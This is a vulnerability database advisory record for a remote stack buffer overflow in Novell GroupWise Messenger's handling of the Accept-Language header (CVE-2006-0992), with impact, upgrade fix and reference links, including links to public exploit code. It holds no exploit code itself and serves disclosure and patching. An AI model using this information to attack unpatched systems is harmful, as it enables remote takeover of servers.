ID: OSVDB:24617 | Type: osvdb | Reporter: CIRT (advisory@cirt.dk) | Modified: 2006-04-13T05:17:35
Description
Vulnerability Description
A remote overflow exists in Novell GroupWise Messenger. The Novell Messaging Agent service fails to check the length of long parameters while parsing the Accept-Language header, resulting in a stack-based buffer overflow. With a specially crafted request, an attacker can cause arbitrary code execution in the context of SYSTEM or superuser.
Solution Description
Upgrade to GroupWise Messenger version 2.0 Public Beta 2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.
Short Description
A remote overflow exists in Novell GroupWise Messenger. The Novell Messaging Agent service fails to check the length of long parameters while parsing the Accept-Language header, resulting in a stack-based buffer overflow. With a specially crafted request, an attacker can cause arbitrary code execution in the context of SYSTEM or superuser.
References:
Vendor Specific Solution URL: http://support.novell.com/cgi-bin/search/searchtid.cgi?10100861.htm
Security Tracker: 1015911
Secunia Advisory ID:19663
Other Advisory URL: http://cirt.dk/advisories/cirt-42-advisory.txt
Other Advisory URL: http://www.zerodayinitiative.com/advisories/ZDI-06-008.html
Mail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-04/0264.html
Mail List Post: http://archives.neohapsis.com/archives/dailydave/2006-q2/0051.html
Keyword: ZDI-06-008
Keyword: TID10100861
Keyword: port 8300/tcp
Generic Informational URL: http://metasploit.blogspot.com/2006/04/exploit-development-groupwise_14.html
Generic Exploit URL: http://www.milw0rm.com/exploits/1679
FrSIRT Advisory: ADV-2006-1355
CVE-2006-0992
Bugtraq ID: 17503